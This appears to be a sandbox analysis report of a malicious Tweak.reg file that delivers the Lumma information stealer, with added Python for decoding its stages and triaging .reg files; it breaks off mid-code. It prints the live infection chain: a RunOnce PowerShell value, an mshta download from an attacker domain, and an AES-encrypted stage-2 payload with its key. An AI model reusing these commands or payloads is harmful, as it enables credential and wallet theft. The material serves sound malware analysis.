

Windows Analysis Report
Tweak.reg

Overview

General Information

Sample name: Tweak.reg
Analysis ID: 1486296
MD5: baffdb895190cb4ae0324818bf1847d6
SHA1: 89f668869bec3065ba816d3e6ecbceddb43a2462
SHA256: 28923f781c929115c6a1d8e776b020c1a27964f4a94a2a705910a56d7867465e

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Powershell download and execute
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Encrypted powershell cmdline option found
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Powershell drops PE file
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses regedit.exe to modify the Windows registry
Very long command line found
Binary contains a suspicious time stamp
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Powershell In Registry Run Keys
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Process Tree

  • System is w10x64
  • regedit.exe (PID: 6696 cmdline: "regedit.exe" "C:\Users\user\Desktop\Tweak.reg" MD5: 999A30979F6195BF562068639FFC4426)
  • powershell.exe (PID: 6908 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 7176 cmdline: "C:\Windows\system32\mshta.exe" https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • powershell.exe (PID: 7436 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split ($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac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kCTD = [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D794355577548');$WkCTD.IV = New-Object byte[] 16;$tcgVjsHd = $WkCTD.CreateDecryptor();$HeZGuqYHp = $tcgVjsHd.TransformFinalBlock($SQYQyiT, 0, $SQYQyiT.Length);$sMCijoeKV = [System.Text.Encoding]::Utf8.GetString($HeZGuqYHp);$tcgVjsHd.Dispose();& $sMCijoeKV.Substring(0,3) $sMCijoeKV.Substring(3) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • AutoIt3.exe (PID: 8072 cmdline: "C:\Users\user\AppData\Roaming\AutoIt3.exe" "C:\Users\user\AppData\Roaming\DesolateOxidant.a3x" MD5: 3F58A517F1F4796225137E7659AD2ADB)
  • svchost.exe (PID: 7284 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • powershell.exe (PID: 7728 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 7876 cmdline: "C:\Windows\system32\mshta.exe" https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • powershell.exe (PID: 7956 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split ($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac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kCTD = [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D794355577548');$WkCTD.IV = New-Object byte[] 16;$tcgVjsHd = $WkCTD.CreateDecryptor();$HeZGuqYHp = $tcgVjsHd.TransformFinalBlock($SQYQyiT, 0, $SQYQyiT.Length);$sMCijoeKV = [System.Text.Encoding]::Utf8.GetString($HeZGuqYHp);$tcgVjsHd.Dispose();& $sMCijoeKV.Substring(0,3) $sMCijoeKV.Substring(3) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • AutoIt3.exe (PID: 8128 cmdline: "C:\Users\user\AppData\Roaming\AutoIt3.exe" "C:\Users\user\AppData\Roaming\DesolateOxidant.a3x" MD5: 3F58A517F1F4796225137E7659AD2ADB)
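The two powershell.exe command lines in the process tree above are the whole delivery chain. The first one (also the RunOnce value written by regedit.exe) runs with -eNC, i.e. -EncodedCommand, whose argument is base64 over UTF-16LE text, not UTF-8; decoded, it invokes mshta.exe with the DonaldDuck URL through the dot call operator. The HTA then starts a second powershell.exe that turns a hex string into bytes (the tCqzac function), AES-decrypts it with a hard-coded 16-byte key (so AES-128, CBC and PKCS7 being the .NET defaults) and an all-zero IV, and executes the first three characters of the result as a command with the rest as its argument. Both the flag -eNC and the RunOnce value pOwErsHELl are mixed-case, so any matching must be case-insensitive. The Python below is an added triage example, not code from the report or from the sample: it reuses only the base64 string and the key hex copied from the command lines above; the function names and the cryptography dependency are the example's own, and because the stage-2 ciphertext appears in this report only as a line-wrapped hex blob, the AES step is exercised on a constructed plaintext encrypted with the same parameters rather than on the real blob.

```python
"""Decode the two PowerShell stages seen in the process tree (stage 1: -eNC, stage 2: AES)."""
import base64
import importlib.util
import re
from typing import Optional

# Copied from the first powershell.exe command line (and from the RunOnce value).
STAGE1_ENC = ("LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA")
# Copied from the second powershell.exe command line: $WkCTD.Key = tCqzac('...')
STAGE2_KEY_HEX = "7151766748794165544D794355577548"


def extract_encoded_arg(cmdline: str) -> Optional[str]:
    """Return the base64 after -e / -ec / -enc / -EncodedCommand. powershell.exe accepts
    any prefix of the flag, case-insensitively; -ep, -exec and friends are not matched."""
    m = re.search(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    return m.group(1) if m else None


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE text (a UTF-8 decode yields garbage)."""
    return base64.b64decode(b64).decode("utf-16-le")


def stage1_target(decoded: str) -> tuple:
    """Stage 1 has the shape  .'cmd'<arg> : the dot call operator runs the quoted
    command name with the remainder as its argument (mshta and the URL here)."""
    m = re.fullmatch(r"\.\s*'([^']+)'\s*(\S+)", decoded.strip())
    if not m:
        raise ValueError("unexpected stage-1 shape: " + decoded)
    return m.group(1), m.group(2)


def tcqzac(hex_str: str) -> bytes:
    """Python equivalent of the script's tCqzac(): -replace '..','0x$& ' followed by
    -split turns every pair of hex digits into one byte."""
    if len(hex_str) % 2:
        raise ValueError("hex string must have even length")
    return bytes.fromhex(hex_str)


def stage2_key() -> bytes:
    return tcqzac(STAGE2_KEY_HEX)  # 16 bytes, so [Aes]::Create() ends up as AES-128


def aes_available() -> bool:
    return importlib.util.find_spec("cryptography") is not None


def decrypt_stage2(ciphertext_hex: str, key: bytes) -> str:
    """Mirror of the PowerShell: AES in CBC mode with PKCS7 padding (the .NET defaults),
    IV = New-Object byte[] 16 (all zero), TransformFinalBlock strips the padding and the
    result is decoded as UTF-8. Needs the 'cryptography' package."""
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    dec = Cipher(algorithms.AES(key), modes.CBC(bytes(16))).decryptor()
    padded = dec.update(tcqzac(ciphertext_hex)) + dec.finalize()
    unpad = padding.PKCS7(128).unpadder()
    return (unpad.update(padded) + unpad.finalize()).decode("utf-8")


def encrypt_like_stage2(plaintext: str, key: bytes) -> str:
    """Inverse of decrypt_stage2; only used to build a constructed ciphertext so the
    decryptor can be checked offline without the real stage-2 blob."""
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    pad = padding.PKCS7(128).padder()
    padded = pad.update(plaintext.encode("utf-8")) + pad.finalize()
    enc = Cipher(algorithms.AES(key), modes.CBC(bytes(16))).encryptor()
    return (enc.update(padded) + enc.finalize()).hex().upper()


def split_stage2(plaintext: str) -> tuple:
    """The script ends with  & $s.Substring(0,3) $s.Substring(3) : the first three
    characters are run as a command and the remainder is passed as its argument."""
    return plaintext[:3], plaintext[3:]


if __name__ == "__main__":
    cmd = '"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe" -eNC ' + STAGE1_ENC
    stage1 = decode_encoded_command(extract_encoded_arg(cmd))
    print("stage 1:", stage1)
    print("stage 1 runs:", stage1_target(stage1))
    print("stage 2 key bytes:", stage2_key())
    if aes_available():
        # Constructed plaintext; the page does not show the real decrypted stage 2.
        ct = encrypt_like_stage2("abcWrite-Host constructed", stage2_key())
        print("round trip:", split_stage2(decrypt_stage2(ct, stage2_key())))
```

To decrypt the real stage 2, join the line-wrapped hex inside tCqzac('...') from the Sigma match below into one string and pass it to decrypt_stage2 with stage2_key(); the key hex itself decodes to the printable ASCII string qQvgHyAeTMyCUWuH, which is a useful pivot when hunting for sibling samples.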
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
No configs have been found
Source: Process Memory Space: powershell.exe PID: 7436 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 7436 | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen | Strings:
    • 0xcc4aa:$b1: ::WriteAllBytes(
    • 0xcd0a7:$b1: ::WriteAllBytes(
    • 0x1129c2:$b1: ::WriteAllBytes(
    • 0x113c68:$b1: ::WriteAllBytes(
    • 0xc9f7e:$s1: -join
    • 0x19a514:$s1: -join
    • 0x19b81a:$s1: -join
    • 0x20c40d:$s1: -join
    • 0x2194e2:$s1: -join
    • 0x21c8b4:$s1: -join
    • 0x21cf66:$s1: -join
    • 0x21ea57:$s1: -join
    • 0x220c5d:$s1: -join
    • 0x221484:$s1: -join
    • 0x221cf4:$s1: -join
    • 0x22242f:$s1: -join
    • 0x222461:$s1: -join
    • 0x2224a9:$s1: -join
    • 0x2224c8:$s1: -join
    • 0x222d18:$s1: -join
    • 0x222e94:$s1: -join
Source: Process Memory Space: powershell.exe PID: 7956 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 7956 | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen | Strings:
      • 0x5a992:$b1: ::WriteAllBytes(
      • 0x5b2b3:$b1: ::WriteAllBytes(
      • 0x5bab5:$b1: ::WriteAllBytes(
      • 0x1c0033:$b1: ::WriteAllBytes(
      • 0x1c054e:$b1: ::WriteAllBytes(
      • 0x1c0f60:$b1: ::WriteAllBytes(
      • 0x1c186a:$b1: ::WriteAllBytes(
      • 0x2312db:$b1: ::WriteAllBytes(
      • 0x232583:$b1: ::WriteAllBytes(
      • 0x58089:$s1: -join
      • 0x94732:$s1: -join
      • 0x9f8a2:$s1: -join
      • 0x10c1d1:$s1: -join
      • 0x1192a6:$s1: -join
      • 0x11c678:$s1: -join
      • 0x11cd2a:$s1: -join
      • 0x11e81b:$s1: -join
      • 0x120a21:$s1: -join
      • 0x121248:$s1: -join
      • 0x121ab8:$s1: -join
      • 0x1221f3:$s1: -join
Source: amsi64_7436.amsi.csv | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen | Strings:
      • 0xc85e:$b1: ::WriteAllBytes(
      • 0xc4d1:$s1: -join
      • 0x5c7d:$s4: +=
      • 0x5d3f:$s4: +=
      • 0x9f66:$s4: +=
      • 0xc083:$s4: +=
      • 0xc36d:$s4: +=
      • 0xc4b3:$s4: +=
      • 0x19de8:$s4: +=
      • 0x19eec:$s4: +=
      • 0x1d348:$s4: +=
      • 0x1da28:$s4: +=
      • 0x1dede:$s4: +=
      • 0x1df33:$s4: +=
      • 0x1e1a7:$s4: +=
      • 0x1e1d6:$s4: +=
      • 0x1e71e:$s4: +=
      • 0x1e74d:$s4: +=
      • 0x1e82c:$s4: +=
      • 0x20ac3:$s4: +=
      • 0x20e25:$s4: +=
Source: amsi64_7956.amsi.csv | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen | Strings:
      • 0xc85e:$b1: ::WriteAllBytes(
      • 0xc4d1:$s1: -join
      • 0x5c7d:$s4: +=
      • 0x5d3f:$s4: +=
      • 0x9f66:$s4: +=
      • 0xc083:$s4: +=
      • 0xc36d:$s4: +=
      • 0xc4b3:$s4: +=
      • 0x19de8:$s4: +=
      • 0x19eec:$s4: +=
      • 0x1d348:$s4: +=
      • 0x1da28:$s4: +=
      • 0x1dede:$s4: +=
      • 0x1df33:$s4: +=
      • 0x1e1a7:$s4: +=
      • 0x1e1d6:$s4: +=
      • 0x1e71e:$s4: +=
      • 0x1e74d:$s4: +=
      • 0x1e82c:$s4: +=
      • 0x20ac3:$s4: +=
      • 0x20e25:$s4: +=

      System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\system32\mshta.exe" https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck, CommandLine: "C:\Windows\system32\mshta.exe" https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6908, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck, ProcessId: 7176, ProcessName: mshta.exe
      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split ($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac('2F92616FCA1E637E204E02A98BAB656B9EC67566C63384DBBA915194A26AF3C99FF78C879D2671A61F9DE3FFD05CE7A373EC6999C11F2AE65D883254059A8F5DD52C6EF70BFD4877EC5470233CCF8C213A8F6C3B33F727D7EFEF9E317E238D51754C64F55FD36A2589609D7C13781064CD0882248925DC090ED875EA7328A961D8F19BDA01E615861B627059F79049F57B3247A84C248BA78C08603403E1AE25A41B0A8E9DD38F8C4A4081D4274AE388388659516790B04238778E0F5658CC4E7B8F740A831B86CE3EFD019A79F77BE8F78EB2E2CA234D0C6D81A7CEACE3F908562BA1EA41EAB6FF399EF717AA496847BEFD1DEB1F7B5AA3887325ABF9EEF02FE6982E64EC9D3A2425D14C12AD043DC5C6031BE4743B30CB9771A566A007E065215522047C54A3A10753B2A266B4BE44ABB6CC95BD1C8F09E68F17760528BCA6460C89ABD112854B22D2A30FEFACBDAD91533869CBAA510D9AEE6DFA15E320B7AFD60201785519583AE149ADC0F90A8952F25FF47A4ED635E1B047ACFE73F6A3F4DE14C2A855847AF9BE35A9B33A08C7ABF7A00F27594B28D5E0FA51AA3F90BF24D901F140F816D5D4EBF7AA6FA485FDC8089FEF1D65D5798A7A7C513EFB05E816E80A2F1DDFE3BA76DA0E722B38F8740DCB9E6E71B59D4E4CDFAA9F2EF98D1569B83EA76739999F4AFC232F29ABC60B904DFCCA5F115A5A8559E36094E8F37943EFCABA23E670D451CE32C68AD3028B217CEEF7FB1CF47C97D30D069B3F065987B4F034029EE5D245366FE897472BBF68358F983C4388E9EDBE009B15763EA5A4C065248C0153CB15A281585BC9621504C2AB9E8F3BA0A95A0DCF141ADD7A86BB23134BB59CE46943F1107FE42751B10616A7FA72EA7AA54509CB02831AE69BDF94A6D6FED1A11CEBA936D6B8DE427BDACBAA0AAD1A7CFBEB89E6108DEF6F0852AF4BB67846A3ACF806D21D324D0C50B0F62CAD51058D241391A6B2446D777805760A992C50DBC13108296D969C721CEC4BA28B6488AB72DF32BD755FC7D5C5D3D56680F0AAB9BDC8DD664CBBF8E2BCDD82462778CEF31E33C24A4749F12603EB49D4C9D110A17107C7B97C1E54EB654988E65CE15CD969F93C091DFABE466D71228914296A73B782ECF0FFF3DF80313CA3128BCD8296F524EE35DB155C2AE0EF4C69075B57E36D24E8E31218CA60AA4FA168657C062B42B2F5EA45AAFDBF6276668F6A9F867184E90C03C86C65B
CCE49654A66FA3D306694FFACDD32F762E1D88075F651C9159F15813EEE0CA477A8C578C19D44D1E39E106809A3CD869B8E088ACDCCE32E23A70F5F942E8DAEE3012D81B73B3B94D05D727127DFDA24F3F54EC5E3BFAC83121DF59E941DC4ACA17CA5EAD44C61DE8BDF84E32290F7543ABE02060DC41362B94A5F07EEEE330B97553B46859432CC68F214B302C4E6F63055D0F83E01F7974F1B300238EEC9B49AC5DE3C1D9A3ED90F4056FDACE9CD348ACE2412CC387A9FF17100724C029B670EA9C692E997BFF90AA0531E793E1DD4154E64151DCFF01CCE768C6DB40FFFF11494DF2DB99E1C1159873FA31A4E0EB1036654DE9137700E275DE2AE79BCB348D213215787A6A3452F822EF24303FC84259471E723768093E063D12DFCA583A0490658323B87F8A0C3E9109F45D9A37F26AC77552D7C68589CA46A0E8D1AB24D1B10A54D0FB256338B5880738577EC794452BC27B0BA2FD9C876306E1588376A94292582E639FBC261E841194317C38EC2F485F56690F6ACE333EE430ED468C2F9690E96F6497247EDA10E0FF53275B4125360F8405E4758A308E913B6295D4F395D02B2239E6E4257B5152E7F8ACD075E8C6B312EC73595C476BB1E814D001B81F9');$WkCTD = [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D794355577548');$WkCTD.IV = New-Object byte[] 16;$tcgVj
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split ($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac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kCTD = [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D794355577548');$WkCTD.IV = New-Object byte[] 16;$tcgVj
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: pOwErsHELl -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA, EventID: 13, EventType: SetValue, Image: C:\Windows\regedit.exe, ProcessId: 6696, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\MegaLIMLauncher
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7436, TargetFilename: C:\Users\user\AppData\Roaming\AutoIt3.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA, CommandLine|base64offset|contains: B, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA, ProcessId: 6908, ProcessName: powershell.exe
Source: Registry Key set | Author: frack113, Florian Roth (Nextron Systems) | Data: Details: pOwErsHELl -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA, EventID: 13, EventType: SetValue, Image: C:\Windows\regedit.exe, ProcessId: 6696, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\MegaLIMLauncher
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA, CommandLine|base64offset|contains: B, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA, ProcessId: 6908, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7284, ProcessName: svchost.exe
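The two Registry Key set matches above are what importing Tweak.reg actually does: regedit.exe writes HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\MegaLIMLauncher with the mixed-case value pOwErsHELl -eNC ..., so the whole chain restarts at the next logon with no executable of its own on disk at that point (the "registry only malware" signature above). A .reg file is therefore worth triaging statically before anyone double-clicks it. The Python below is an added example of that triage, not the sample and not part of the report: the .reg content it parses is a constructed stand-in consistent with the SetValue recorded above (the real Tweak.reg bytes are not reproduced on this page), with an extra hex(2) REG_EXPAND_SZ value under Run added only to exercise that encoding and the line-continuation syntax. The autostart key list, the severity labels and the function names are the example's own choices; the base64 decoding is the same UTF-16LE rule -EncodedCommand uses.

```python
"""Static triage of a .reg file: list autostart values and decode encoded PowerShell."""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed stand-in for Tweak.reg (the sample's bytes are not on the page). The
# RunOnce value matches the SetValue the sandbox recorded; the Run\Demo value is a
# made-up REG_EXPAND_SZ stored as hex(2) with a continuation line.
SAMPLE_REG = (
    "Windows Registry Editor Version 5.00\r\n\r\n"
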